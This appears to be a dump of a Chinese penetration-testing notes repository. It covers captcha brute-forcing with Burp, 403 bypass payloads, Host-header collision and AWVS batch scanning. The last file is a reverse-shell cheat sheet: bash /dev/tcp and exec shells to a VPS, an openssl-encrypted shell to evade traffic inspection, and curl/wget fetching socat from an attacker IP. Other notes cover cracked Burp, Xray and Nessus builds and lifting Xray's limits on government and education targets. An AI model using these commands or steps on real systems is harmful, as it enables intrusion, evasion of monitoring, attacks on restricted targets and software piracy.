44 | Accept-Language: zh-CN,zh;q=0.9 45 | Content-Type: application/x-www-form-urlencoded 46 | Content-Length: 55 47 | 48 | <@BASE64><@IMG_RAW> 49 | ``` 50 | 点击识别,可以看到能够识别到验证码 51 | ![image](./爆破带有验证码的Web登录表单/05.png) 52 | 点击锁定 53 | ![image](./爆破带有验证码的Web登录表单/03.png) 54 | 55 | # step5-暴力破解 56 | burp拦截登录数据包 57 | ![image](./爆破带有验证码的Web登录表单/06.png) 58 | 发送到intruder,选择Pitchfork 59 | ![image](./爆破带有验证码的Web登录表单/07.png) 60 | payload1正常选择字典,payload2选择如下 61 | ![image](./爆破带有验证码的Web登录表单/08.png) 62 | ![image](./爆破带有验证码的Web登录表单/09.png) 63 | 线程选择1,发送延时为500ms 64 | ![image](./爆破带有验证码的Web登录表单/10.png) 65 | 可看到能够成功爆破带有验证码的Web表单,识别率在80%左右 66 | ![image](./爆破带有验证码的Web登录表单/11.png) 67 | 68 | # 参考链接 69 | https://mp.weixin.qq.com/s/_P6OlL1xQaYSY1bvZJL4Uw 70 | https://github.com/f0ng/captcha-killer-modified 71 | https://github.com/c0ny1/captcha-killer 72 | https://gv7.me/articles/2019/burp-captcha-killer-usage/ 73 | https://github.com/sml2h3/ddddocr -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/01.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/02.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/03.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/04.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/05.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/06.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/07.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/07.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/08.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/09.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/09.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/10.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/11.png -------------------------------------------------------------------------------- /01-案例学习/记一次常规的Bypass 宝塔防火墙 文件上传.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/记一次常规的Bypass 宝塔防火墙 文件上传.pdf -------------------------------------------------------------------------------- /02-资产收集/403绕过原理.md: -------------------------------------------------------------------------------- 1 | 一直想学习下403绕过,换了新公司后终于有时间可以学习下 2 | 3 | 简单概括下漏洞原理: 4 | 当下的软件部署方式通常是nginx在前端做反向代理,后端用java或php开发,开发者一般通过nginx识别访问端ip,以此限制对接口的访问,我们可以利用nginx在权限校验方面的缺陷,来绕过限制,具体如下: 5 | 6 | # 01 修改URL扩展名 7 | ``` 8 | site.com/admin => 403 9 | 10 | site.com/admin/ => 200 11 | site.com/random-dir/../admin => 200 12 | site.com/random-dir/..;/admin => 200 13 | site.com/random-dir/..%252F/admin => 200 14 | site.com/admin// => 200 15 | site.com//admin// => 200 16 | site.com/admin/* => 200 17 | site.com/admin/*/ => 200 18 | site.com/admin/. => 200 19 | site.com/admin/./ => 200 20 | site.com/./admin/./ => 200 21 | site.com/admin/./. => 200 22 | site.com/admin/./. => 200 23 | site.com/admin? => 200 24 | site.com/admin?? => 200 25 | site.com/admin??? => 200 26 | site.com/admin..;/ => 200 27 | site.com/admin/..;/ => 200 28 | site.com/%2f/admin => 200 29 | site.com/%2e/admin => 200 30 | site.com/admin%20/ => 200 31 | site.com/admin%09/ => 200 32 | site.com/%20admin%20/ => 200 33 | site.com/%0dadmin => 200 34 | ``` 35 | # 01 修改代理IP 36 | ``` 37 | - X-Originating-IP: 127.0.0.1 38 | - X-Remote-IP: 127.0.0.1 39 | - X-Client-IP: 127.0.0.1 40 | - X-Forwarded-For: 127.0.0.1 41 | - X-Forwared-Host: 127.0.0.1 42 | - X-Host: 127.0.0.1 43 | - X-Custom-IP-Authorization: 127.0.0.1 44 | ``` 45 | 示例代码 46 | ``` 47 | Request 48 | GET /auth/login HTTP/1.1 49 | Response 50 | HTTP/1.1 401 Unauthorized 51 | 52 | Reqeust 53 | GET /auth/login HTTP/1.1 54 | X-Custom-IP-Authorization: 127.0.0.1 55 | Response 56 | HTTP/1.1 200 OK 57 | ``` 58 | # 02 修改Referer标头 59 | Referer请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用 Referer 请求头识别访问来源,示例代码如下: 60 | ``` 61 | Request 62 | GET /auth/login HTTP/1.1 63 | Host: xxx 64 | Response 65 | HTTP/1.1 403 Forbidden 66 | 67 | Reqeust 68 | GET / HTTP/1.1 69 | Host: xxx 70 | Referer: https://xxx/auth/login 71 | Response 72 | HTTP/1.1 200 OK 73 | 74 | or 75 | 76 | Reqeust 77 | GET /auth/login HTTP/1.1 78 | Host: xxx 79 | Referer: https://xxx/auth/login 80 | Response 81 | HTTP/1.1 200 OK 82 | ``` 83 | # 03 覆盖请求URL 84 | 如果目标支持X-Original-URL和X-Rewrite-URL标头,用户可以使用X-Original-URL或X-Rewrite-URL请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制,示例代码如下: 85 | ``` 86 | Request 87 | GET /auth/login HTTP/1.1 88 | Response 89 | HTTP/1.1 403 Forbidden 90 | 91 | Reqeust 92 | GET / HTTP/1.1 93 | X-Original-URL: /auth/login 94 | Response 95 | HTTP/1.1 200 OK 96 | 97 | or 98 | 99 | Reqeust 100 | GET / HTTP/1.1 101 | X-Rewrite-URL: /auth/login 102 | Response 103 | HTTP/1.1 200 OK 104 | 105 | ``` 106 | # 04 修改HOST(这块原文讲的不是很清楚,看到的不是很明白) 107 | 我们先说下Host在请求头中的作用,在一般情况下,几个网站可能会部署在同一个服务器上,或者几个web系统共享一个服务器,通过host头来指定应该由哪个网站或者web系统来处理用户的请求。而很多 WEB 应用通过获取 HTTP HOST 头来获得当前请求访问的位置,但是很多开发人员并未意识到 HTTP HOST 头由用户控制,从安全角度来讲,任何用户输入都是认为不安全的。 108 | # 05 端口利用 109 | 全端口扫描后,在其他端口可能会发现可未授权访问的web系统 110 | 111 | # 参考文章 112 | 113 | https://blog.csdn.net/st3pby/article/details/128485994 -------------------------------------------------------------------------------- /02-资产收集/Host碰撞原理.md: -------------------------------------------------------------------------------- 1 | 2 | 一直想学习下Host碰撞,换了新公司后终于有时间可以学习下 3 | 4 | # 0x01 漏洞原理 5 | 在当今的反向代理技术架构下,正常访问一个网站的流程是: 6 | 用户通过浏览器访问一个域名 -> 先在本地hosts文件中查询域名对应的IP,没查到的话再通过DNS查询域名对应的IP -> 访问查询到的IP并以最初访问的域名作为请求头中host字段的值 -> 反代服务器nginx根据host字段的值转发到对应的server_name下 7 | 8 | 补充一句:有些网站通过IP不能直接访问就是因为它本身是一个反代服务器,并且在配置文件中配置了不允许通过IP直接访问 9 | 10 | nginx配置文件——反代服务器,注释中包含对配置文件的解释: 11 | ``` 12 | server { 13 | listen 8080 default_server; # 指定当前为默认server 14 | 15 | # host为空时返回400 16 | server_name _; 17 | return 400; 18 | } 19 | server { 20 | listen 8080; 21 | 22 | # host为test.com时,转发到http://127.0.0.1:80 23 | server_name test.com; 24 | location { 25 | proxy_pass http://127.0.0.1:80; 26 | proxy_redirect off; 27 | proxy_set_header Host $host:$server_port; 28 | proxy_set_header X-Real-IP $remote_addr; 29 | root html; 30 | index index.html index.htm; 31 | } 32 | 33 | access_log logs/test.com.log; 34 | } 35 | ``` 36 | nginx配置文件——业务 37 | ``` 38 | server { 39 | listen 80; 40 | server_name localhost; 41 | location { 42 | root usr/share/nginx/html; 43 | index index.html index.htm; 44 | } 45 | error_page 500 502 503 504 50x.html; 46 | location = 50x.html { 47 | root usr/share/nginx/html; 48 | } 49 | } 50 | ``` 51 | 漏洞就出现在,当目标单位删除了DNS中host对应的IP,但是没有删除反代服务器中host对应的server,此时我们访问反代服务器的IP且host头中带有对应域名,若域名匹配反代服务器的server,则能够访问到内网业务 52 | 53 | # 漏洞利用 54 | 分析完了漏洞形成的原因,我们知道如果找到域名解析对应的IP,且访问IP时host头带上对应的域名,则可以访问目标单位的内部资产,那如何找到域名解析对应的IP,就需要大量的IP和域名来进行碰撞 55 | 56 | 参考工具:https://github.com/pmiaowu/HostCollision 57 | 58 | # 参考链接 59 | 团队内部分享:WEB非实用之host碰撞挖掘 60 | https://www.modb.pro/db/136373 -------------------------------------------------------------------------------- /03-漏洞检测/AWVS/awvs14-scan-master/README.md: -------------------------------------------------------------------------------- 1 | # 免责声明 2 | 本项目仅用于安全自查,请勿利用文章内的相关工具与技术从事非法测试,如因此产生的一切不良后果与本项目无关 3 | 4 | 5 | 6 | 本工具来自知识星球-BugBounty漏洞赏金自动化: 7 | 8 | ![image](https://user-images.githubusercontent.com/50769953/167792916-20a9ee30-6f66-4f83-aa87-2c53e088565a.png) 9 | 10 | 11 | 12 | ## awvs14-scan 13 | 支持awvs14,15 修复多个Bug,config增加配置参数 14 | 15 | config.ini 请使用编辑器更改,记事本会改会原有格式 16 | 17 | 针对 AWVS 14版本开发的批量扫描脚本,支持SpringShell\log4j\常见CVE\Bug Bounty\常见高危\SQL注入\XSS等 专项漏洞的扫描,支持联动xray、burp、w13scan等被动批量扫描,灵活自定义扫描模板 18 | 19 | ``` 20 | ******************************************************************** 21 | 1 【批量添加url到AWVS扫描器扫描】 22 | 2 【删除扫描器内所有目标与扫描任务】 23 | 3 【删除所有扫描任务(不删除目标)】 24 | 4 【对扫描器中已有目标,进行扫描】 25 | 26 | 请输入数字:1 27 | 选择要扫描的类型: 28 | 1 【开始 完全扫描】 29 | 2 【开始 扫描高风险漏洞】 30 | 3 【开始 扫描XSS漏洞】 31 | 4 【开始 扫描SQL注入漏洞】 32 | 5 【开始 弱口令检测】 33 | 6 【开始 Crawl Only,,建议config.ini配置好上级代理地址,联动被动扫描器】 34 | 7 【开始 扫描意软件扫描】 35 | 8 【仅添加 目标到扫描器,不做任何扫描】 36 | 9 【仅扫描apache-log4j】(请需先确保当前版本已支持log4j扫描,awvs 14.6.211220100及以上) 37 | 10 【开始扫描Bug Bounty高频漏洞】 38 | 11 【扫描已知漏洞】(常见CVE,POC等) 39 | 12 【自定义模板】 40 | 13 【仅扫描Spring4ShellCVE-2022-22965】需确保当前版本已支持 41 | 42 | 请输入数字:? 43 | ``` 44 | 45 | ## 14版本脚本功能 46 | 仅支持AWVS14版本的API接口 47 | * 支持URL批量添加扫描 48 | * 支持批量仅扫描apache-log4j漏洞 49 | * 支持对批量url添加`cooKie`凭证进行爬虫扫描 50 | * 支持对批量url添加1个或多个不同请求头 51 | * 支持配置上级代理地址,能结合被动扫描器进行配置扫描,如:`xray`,`w13scan`,`burp`等扫描器 52 | * 支持一键清空所有任务 53 | * 通过配置`config.ini`文件,支持自定义各种扫描参数,如:爬虫速度,排除路径(不扫描的目录),全局`cookie`,限制为仅包含地址和子目录 54 | * 支持对扫描器内已有目标进行批量扫描,支持自定义扫描类型 55 | 56 | 57 | 58 | ## Linux AWVS14 docker安装 59 | 推荐使用docker 60 | ``` 61 | 4月1号更新 支持Support Scanning !Spring4Shell (CVE-2022-22965) !!! 62 | 63 | 安装: docker pull xiaomimi8/docker-awvs-14.7.220401065 64 | 65 | 启动用法: docker run -it -d -p 13443:3443 xiaomimi8/docker-awvs-14.7.220401065 66 | 67 | 登录: Username:admin@admin.com password:Admin123 68 | ``` 69 | 70 | ## 赞赏码 71 | 如果对你有帮助的话要不请作者喝杯奶茶?(嘿嘿)👍 (打赏时请留言你的ID 72 | 73 | ![](https://s3.bmp.ovh/imgs/2022/02/185eb77e0285777a.png) 74 | 75 | 76 | -------------------------------------------------------------------------------- /03-漏洞检测/AWVS/awvs14-scan-master/config.ini: -------------------------------------------------------------------------------- 1 | #基本设置 2 | [awvs_url_key] 3 | awvs_url=https://awvs.lan:3443 4 | api_key=1986ad8c0a5b3df4d7028d5f3c06e936cae0628ec040b4125ba20fd8e2fd146e8 5 | 6 | #待扫描的url文件 7 | domain_file=url-968.txt 8 | 9 | ##扫描速度,由慢到快:sequential slow moderate fast, 速度越快,遗漏越多,则之相反 10 | [scan_seting] 11 | scan_speed=moderate 12 | 13 | #扫描时的Cookie,对所有url生效, 如不添加Cookie,请保持为空,即扫描器爬虫自动获取,对所有url全局生效 14 | #例子cookie=BIDUPSID=D40B5A304EFD449C3F8DED17FDF633A0; PSTM=1592016294 15 | cookie= 16 | 17 | #支持1个或多个自定义请求头,对所有url全局生效 18 | #例子custom_headers=["x-auth: 2986ad8c0a5b3","Referer: https://192.168.163.139:13443/"] 19 | custom_headers=[] 20 | 21 | #排除不扫描的目录,通常用于在于添加cookie后,不执行退出,注销等操作,对所有url全局生效 22 | #例子excluded_paths=['quit','exit','logout','Logout','delete','DELETE','注销','退出','删除'] 23 | excluded_paths=[] 24 | 25 | 26 | ##将抓取限制为仅包含地址和子目录 值:true(默认)/False,建议False更好 27 | limit_crawler_scope=False 28 | 29 | ##配置上级代理地址,如联动被动扫描器,目标调试等,对所有url全局生效、 30 | #例子proxy_server=127.0.0.1:7777 不要带http,没有请保持空, proxy_enabled=False\True 注意大小写 31 | proxy_enabled=False 32 | proxy_server=127.0.0.1:8080 33 | -------------------------------------------------------------------------------- /03-漏洞检测/BurpSuite下repeater中request不能识别空格/readme.md: -------------------------------------------------------------------------------- 1 | 如题,在一次渗透测试中,发现每次构造sql语句都要手动将空格改为%20,太麻烦了,而且burp中暂时没找到将空格转化为%20的功能,于是写了一个python脚本 2 | ``` 3 | #!/usr/bin/python3 4 | 5 | def main(): 6 | var = input("Please input the string: "); 7 | str = ""; 8 | for i in var: 9 | if i == " ": 10 | i = "%20"; 11 | str += i; 12 | print(str); 13 | 14 | main(); 15 | ``` 16 | 17 | # 2021/03/11更新 18 | burp下repeater中正常就是不能对空格进行自动编码的,浏览器能对空格进行自动编码 19 | -------------------------------------------------------------------------------- /03-漏洞检测/BurpSuite下repeater出现中文乱码/readme.md: -------------------------------------------------------------------------------- 1 | 事情源于我在一次授权渗透测试中发现一处sql注入漏洞,在爆库时发现有个数据库是中文,当在repeater->request中输入中文时,发现乱码 2 | 本以为是我当前使用的kali系统不支持中文字体,结果在win10下尝试仍旧乱码 3 | 网上查阅了一些资料,所说的办法无非就是user options->display,改字体,改字符集,在kali和win10下尝试,仍旧无效 4 | 本想尝试一些burp extension,结果看完简介后感觉作用都不大,想过尝试汉化版,现在看来,应该也无效 5 | 下载最新版的burpsuite_community_windows-x64_v2020_5_1.exe,尝试后发现在repeater->request中输入中文时,不乱码,怀疑可能是官方在某个版本中修复了此处的中文乱码的问题,我之前用的是burpsuite pro v2.1.04破解版,于是我下载了burpsuite_community_windows-x64_v2_1_04.exe,测试后发现乱码,由此可见,官方应该是在v2.1.04之后的某个版本修复了中文乱码的问题 6 | 为了一劳永逸,不至于以后在burpsuite pro v2.1.04破解版和burpsuite_community_windows-x64_v2020_5_1.exe切换,网上搜索最新的破解版,搜到如下这篇文章 7 | https://xcxmiku.com/archives/38a7a949/ 8 | 里面提供了burpsuite v2020.5.1破解版,经校验,SHA256都正确 9 | 10 | 【关于下载】 11 | 原文中是用的百度云盘分享的文件,我当时下载超级慢,最后实在不想等了,就办了超级会员,为了避免哪位师傅有同样的问题,这里使用天翼云分享给大家,本人测试发现天翼云还是较快的 12 | https://cloud.189.cn/t/VfiyyeYZnaQf (访问码:7xtq) 13 | 如果觉得帮助了你,请给个star 14 | 15 | # 2021/03/11更新 16 | 当前用的就是burpsuite v2020.5.1破解版,仍旧乱码 17 | User options->Display->Character Sets->勾选“使用一个指定的字符集”,字符集选择GB2312 18 | 不再乱码 19 | -------------------------------------------------------------------------------- /03-漏洞检测/BurpSuite激活指南/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/BurpSuite激活指南/pic/1.png -------------------------------------------------------------------------------- /03-漏洞检测/BurpSuite激活指南/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /03-漏洞检测/BurpSuite激活指南/readme.md: -------------------------------------------------------------------------------- 1 | 由于每次burp拿到一个新的虚拟机下使用都需要激活,故有此文 2 | 3 | 查看当前java版本 4 | ``` 5 | java.exe -version 6 | ``` 7 | 我的版本是 8 | ``` 9 | java version "1.8.0_181" 10 | Java(TM) SE Runtime Environment (build 1.8.0_181-b13) 11 | Java HotSpot(TM) 64-Bit Server VM (build 25.181-b13, mixed mode) 12 | ``` 13 | 1、执行如下命令启动密钥生成器 14 | ``` 15 | java.exe -jar .\burp-loader-keygen-2020_2_1.jar 16 | ``` 17 | 如下图 18 | ![image](./pic/1.png) 19 | 2、直接执行start_en-us.vbs启动burp 20 | 3、最后对应着复制粘贴密钥即可 21 | -------------------------------------------------------------------------------- /03-漏洞检测/BurpSuite爆破时payload被url编码/readme.md: -------------------------------------------------------------------------------- 1 | 墨者学院中的一道题,地址如下: 2 | https://www.mozhe.cn/bug/detail/WTNpdGxUS3l4dG9uMFF6ZEs3OEJCdz09bW96aGUmozhe 3 | 在使用burp的intruder时,返回数据包中发现提示“ip违法”,进一步查看,请求的ip地址“128.0.0.2”中的“.”被编码,变为“128%2e0%2e0%2e2” 4 | 解决方式: 5 | Intruder->Payloads->Payload Encoding中的“.”去掉 6 | 7 | 参考链接: 8 | https://nocbtm.github.io/2018/07/27/BurpSuit%20%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%8F%A3%E4%BB%A4/ 9 | -------------------------------------------------------------------------------- /03-漏洞检测/BurpSuite被拦截怎么办/readme.md: -------------------------------------------------------------------------------- 1 | Tools - Proxy - Miscellaneous 2 | 3 | disable web interface 和 suppress burp error 4 | 5 | 文章备份:bp小tips-开启burp代理被拦截怎么办?.html -------------------------------------------------------------------------------- /03-漏洞检测/Goby红队版尝试解密/readme.md: -------------------------------------------------------------------------------- 1 | 看到goby红队版更新了Apache Solr、Apache Druid、Apache Log4j2 JNDI、Apache OFBiz的RCE,顿时不困了,想要捕获goby红队版的流量,看能否解密出exp 2 | 3 | 想用wireshark,但不知如何过滤指定进程的数据包,google一番,看到的回答都是wireshark不能过滤指定进程的数据包 4 | 5 | 在stackoverflow上看到一个回答,推荐用微软的Network Monitor,支持进程名过滤 6 | 参考链接:https://stackoverflow.com/questions/1339691/filter-by-process-pid-in-wireshark 7 | 8 | 开始尝试微软的Network Monitor(小坑1:需要以管理员身份运行,否则看不到网卡) 9 | 启动Network Monitor,打开firefox和goby红队版,如下图 10 | ![image](./尝试解密goby红队版poc/01.png) 11 | 启动更新后和上图相比,发现第2个进程多了一个IP地址:104.21.32.82,查询后发现是Cloudfire节点,难搞啊 12 | ![image](./尝试解密goby红队版poc/02.png) 13 | 查看捕获的网络数据包,没发现什么东西 14 | ![image](./尝试解密goby红队版poc/03.png) 15 | 再次查看本地的poc文件,也是乱码的 16 | ![image](./尝试解密goby红队版poc/04.png) 17 | 看到更新中还包括“赛门铁克高级威胁保护”、vSphere、等的RCE,真的好馋~ 18 | ![image](./尝试解密goby红队版poc/05.png) 19 | ![image](./尝试解密goby红队版poc/06.png) 20 | 既然更新时抓包没发现什么,那就试试攻击时抓包,想一下goby红队发包时的逻辑,应该是先识别到目标再发探测包,所以我们需要目标环境,可是vSphere的下载和安装都是个麻烦事啊,怎么办?没事,我们有空间测绘,通过空间测绘寻找目标,然后通过goby进行检测,最后抓取数据包 21 | 22 | ``` 23 | IPv4.address==3.220.251.239 24 | 8.136.140.77 25 | 3.1.108.37 26 | ``` 27 | 抓取后发现目标并不是直接向主机3.220.251.239发起请求,且数据包是加密的 28 | 29 | 猜测goby红队版是先向一个中间服务器发起请求,再由中间服务器向目标主机发起poc请求,以此实现数据包解密 30 | 31 | 暂时没有办法!!! -------------------------------------------------------------------------------- /03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/01.png -------------------------------------------------------------------------------- /03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/02.png -------------------------------------------------------------------------------- /03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/03.png -------------------------------------------------------------------------------- /03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/04.png -------------------------------------------------------------------------------- /03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/05.png -------------------------------------------------------------------------------- /03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/06.png -------------------------------------------------------------------------------- /03-漏洞检测/Nessus/readme.md: -------------------------------------------------------------------------------- 1 | # 起源 2 | twitter上看到的一篇帖子:https://twitter.com/Elliot58616851 3 | # Docker地址 4 | ``` 5 | https://github.com/elliot-bia/nessus 6 | 7 | docker run -itd -p 8834:8834 ramisec/nessuslite 8 | ``` 9 | # 破解方式 10 | ``` 11 | 原理:进到docker内部,修改nessus的web密码 12 | 13 | 操作: 14 | cd /opt/nessus/sbin/ 15 | sudo ./nessuscli lsuser # 列出所有用户 16 | sudo ./nessuscli chpasswd admin(要更新密码的用户名) # 更新密码 17 | Nessus_Ps0d 18 | 会有2次提示确认 19 | ``` 20 | # 使用方法 21 | https://rorschachchan.github.io/2018/01/23/使用Nessus进行漏洞扫描的过程/ -------------------------------------------------------------------------------- /03-漏洞检测/Xray/readme.md: -------------------------------------------------------------------------------- 1 | # 高级版破解 2 | ``` 3 | xray v1.8.4版本的破解可通过修改日期,不过之后版本的破解用此方式则无效 4 | xray v1.9.3破解版,下载自:微信公众号--小阿辉谈安全 5 | xray v1.9.4破解版,下载自:https://github.com/NHPT/Xray_Cracked 6 | ``` 7 | 8 | # 修改配置文件 9 | ``` 10 | 在配置文件config.yaml中取消对政府、教育等目标的漏扫限制(搜索mitm) 11 | 12 | 如果想让浏览器走xray的话,需要将ca.crt导入到火狐和chrome的根证书颁发机构 13 | 14 | 修改worker数量,parallel: 100 15 | 16 | plugins部分 17 | 将baseline中的子项全部改为false,同时想要排除掉某个poc,可在exclude_poc: [poc-yaml-go-pprof-leak]中添加 18 | 19 | reverse部分 20 | 指定db_file_path和token,修改client中的remote_server和http_base_url 21 | ``` 22 | 23 | # 配置反连平台 24 | 上传 xray_1.9.11_linux_amd64和xray-license.lic 到云服务器 25 | 26 | 步骤1 27 | ``` 28 | 执行 ./xray_1.9.11_linux_amd64 会生成4个配置文件:config.yaml、xray.yaml、module.xray.yaml、plugin.xray.yaml 29 | ``` 30 | 31 | 步骤2 32 | ``` 33 | 编辑本地config.yaml,修改reverse部分 34 | 将http enabled改为true,并指定listen_port 35 | 将client remote_server改为false 36 | 修改后上传到云服务器覆盖原来的config.yaml 37 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/20240701-JAVA环境下SQL注入WAF绕过.md: -------------------------------------------------------------------------------- 1 | 文章链接: 2 | https://mp.weixin.qq.com/s/B6wmJ40Det_eh7hLb8ozoA 3 | 4 | 简单总结: 5 | ``` 6 | 01 fastjson组件处理服务端没有的字段不会报错,因此可以采用垃圾数据的方式绕过WAF(jackson组件处理服务端没有的字段就会报错) 7 | 02 oracle注释 8 | 03 unicode编码 9 | 04 全角空格 10 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/20240704-Linux下反弹Shell.md: -------------------------------------------------------------------------------- 1 | ### 1、判断目标存在哪些反弹shell的命令 2 | ``` 3 | 受害机上执行:whereis bash nc exec telnet python php perl ruby java go gcc g++ 4 | ``` 5 | ### 4、反弹shell 6 | ``` 7 | bash反弹shell: 8 | VPS上执行:nc -n -v -lp 1024 9 | 受害机上执行:/bin/bash -i >& /dev/tcp//1024 0>&1 10 | 需要注意,当在URL地址栏或burp中进行命令注入利用时,需执行:/bin/bash -i %3E%26 /dev/tcp/xx.xx.xx.xx/1024 0%3E%261 11 | 12 | exec反弹shell:0<&196;exec 196<>/dev/tcp//1024; sh <&196 >&196 2>&196 13 | 14 | 其他反弹shell命令可通过浏览器插件Hack-Tools查看 15 | ``` 16 | ### 5、绕过流量审查反弹shell 17 | ``` 18 | 第一步,在VPS上生成SSL证书的公钥/私钥对: 19 | openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 20 | 第二步,VPS监听反弹shell: 21 | openssl s_server -quiet -key key.pem -cert cert.pem -port 443 22 | 第三步,受害机上用openssl加密反弹shell的流量: 23 | mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect xx.xx.xx.xx > /tmp/s;rm /tmp/s 24 | 此时,VPS上成功获取哑shell 25 | ``` 26 | ### 6、将哑shell变为功能齐全的交互式shell 27 | ``` 28 | 第一步,在哑shell中执行: 29 | python -c 'import pty;pty.spawn("/bin/bash")' 30 | 第二步:键入Ctrl-z,回到VPS的命令行中 31 | 第三步,在VPS中执行下述命令回到哑shell中: 32 | stty raw -echo 33 | fg 34 | 第四步,在哑shell中键入Ctrl-l,并执行: 35 | reset 36 | export SHELL=bash 37 | export TERM=xterm-256color 38 | stty rows 54 columns 104 39 | 此时,VPS上的shell为全功能的shell 40 | 41 | 如果拿到的shell执行Ctrl-z会退出会话,可考虑使用socat的方案: 42 | 43 | 攻击机: 44 | socat file:`tty`,raw,echo=0 tcp-listen:4444 45 | 受害机: 46 | curl -o /tmp/socat http://192.168.81.160:8000/socat 或者 wget -O /tmp/socat http://192.168.81.160:8000/socat 47 | chmod u+x /tmp/socat 48 | /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.81.160:4444 49 | 此时拿到的shell可以执行删除、可以选择历史命令、可以执行ctlr-c 50 | 